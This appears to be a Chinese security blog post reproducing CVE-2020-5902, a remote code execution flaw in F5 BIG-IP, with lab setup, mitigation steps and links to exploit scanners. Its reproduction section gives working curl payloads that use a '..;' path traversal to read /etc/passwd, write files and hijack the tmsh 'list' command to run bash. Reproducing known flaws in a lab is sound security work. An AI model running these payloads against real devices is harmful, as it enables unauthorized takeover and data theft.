CVE-2020-5902:F5 BIG-IP 远程代码执行漏洞复现

漏洞复现 Timeline Sec
2020-09-29 10,588
关注我们,一起学安全!
本文作者:TeddyGrey@Timeline Sec
本文字数:1197
阅读时长:3~4min
声明:请勿用作违法用途,否则后果自负

0x01 简介

F5 BIGIP 链路控制器用于最大限度提升链路性能与可用性的下一代广域网链路流量管理。


0x02 漏洞概述

漏洞编号:CVE-2020-5902。未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。该漏洞影响控制面板受影响,不影响数据面板。

0x03 影响版本

BIG-IP 15.x: 15.1.0/15.0.0

BIG-IP 14.x: 14.1.0 ~ 14.1.2

BIG-IP 13.x: 13.1.0 ~ 13.1.3

BIG-IP 12.x: 12.1.0 ~ 12.1.5

BIG-IP 11.x: 11.6.1 ~ 11.6.5





0x04 环境搭建


1、在官网下载vmware文件

https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.1.0&container=Virtual-Edition

2、直接访问会跳转,需要注册个账号~

3、导入Vmware:文件-->打开-->一路下一步导入虚拟机导入后直接启动即可系统默认账户:root/default登陆后需要修改默认密码,之后ifconfig查看IP


浏览器访问https://192.168.150.147,跳转如下图就说明好啦!


0x05 漏洞复现


执行tmsh命令

payload


curl -k " 
curl -k "https://192.168.150.146/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
写入

curl -k -H "Content-Type: application/x-www-form-urlencoded" -X POST -d "fileName=/tmp/success&content=CVE-2020-5902" "https://192.168.150.146/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp"




读取







curl -k "https://192.168.150.146/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/success"




1. 修改alias劫持list命令为bash

curl -k "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"




2. 写入bash文件







curl -k "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=id"




3. 执行bash文件







curl -k "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/test"




4. 还原list命令







curl -k "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list"




image.png


payload:


劫持list命令实现任意命令执行


image.png


payload:


任意文件上传


image.png


payload:


任意文件读取


image.png











0x06 修复方式















官方建议可以通过以下步骤临时缓解影响


1) 使用以下命令登录对应系统
tmsh
2) 编辑 httpd 组件的配置文件
edit /sys httpd all-properties
3) 文件内容如下
include ' <LocationMatch ".*\.\.;.*"> Redirect 404 / </LocationMatch> '
4) 按照如下操作保存文件
按下 ESC 并依次输入 :wq
5) 执行命令刷新配置文件
save /sys config
6) 重启 httpd 服务
restart sys service httpd
并禁止外部IP对 TMUI 页面的访问


相关利用脚本:







https://github.com/aqhmal/CVE-2020-5902-Scannerhttps://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse




image.png


参考链接:




  https://cert.360.cn/warning/detail?id=a1768348bde7807647cbc7232edce7df


https://github.com/jas502n/CVE-2020-5902


https://blog.csdn.net/ice_age1/article/details/49998059

本文作者:Timeline Sec

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/142397.html

Tags:
点赞: 2 评论:0 收藏: 0
新浪微博 QQ空间 微信扫一扫
评论  (0)
快来写下你的想法吧!

Timeline Sec
文章数:38 积分: 190

欢迎关注公众号Timeline Sec

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号

活动日程

2022-06-17

Gdevops 全球敏捷运维峰会

2022-05-12

Mastering the Challenge!——来自The 3rd AutoCS 2022智能汽车信息安全大会的邀请函

2021-11-18

AutoSW 2021智能汽车软件开发大会

2021-06-27

2021中国国际网络安全博览会暨高峰论坛

2021-05-27

The 2nd AutoCS 2021智能汽车信息安全大会

2020-12-18

贝壳找房2020 ICS安全技术峰会

2020-12-11

全球敏捷运维峰会(Gdevops2020)

2020-12-04

2020京麒网络安全大会

2020-11-29

OPPO技术开放日第六期|聚焦应用与数据安全防护

2020-11-27

EISS-2020企业信息安全峰会之上海站 11.27

2020-09-24

CSDI summit中国软件研发管理行业技术峰会

2020-09-23

2020中国国际智慧能源暨能源数据中心与网络信息安全装备展览会

2020-07-31

EISS-2020企业信息安全峰会之北京站 | 7.31(周五线上)

2020-04-15

看雪.安恒 2020 KCTF 春季赛

2020-01-09

相约本地生活安全沙龙暨白帽子颁奖典礼